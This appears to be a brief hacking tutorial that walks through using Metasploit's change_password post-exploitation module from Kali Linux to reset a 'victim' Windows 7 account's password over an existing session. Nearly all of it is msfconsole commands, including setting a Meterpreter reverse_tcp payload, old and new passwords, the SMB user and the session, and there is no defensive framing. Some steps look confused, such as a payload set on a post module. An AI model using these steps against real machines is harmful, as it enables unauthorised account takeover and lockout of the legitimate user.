Set New Password of Victim PC Remotely
This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a remote host to avoid the error, ‘System error 1907 has occurred,’ which is caused when the account policy enforces a password change before the next login.
Exploit Targets
Windows 7
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use post/windows/manage/change_password
msf exploit (change_password)>set payload windows/meterpreter/reverse_tcp
msf exploit (change_password)>set old_password (Type your old password)
msf exploit (change_password)>set new_password (New password You want to set)
msf exploit (change_password)>set smbuser (User name of PC)
msf exploit (change_password)>set session 1
msf exploit (change_password)>exploit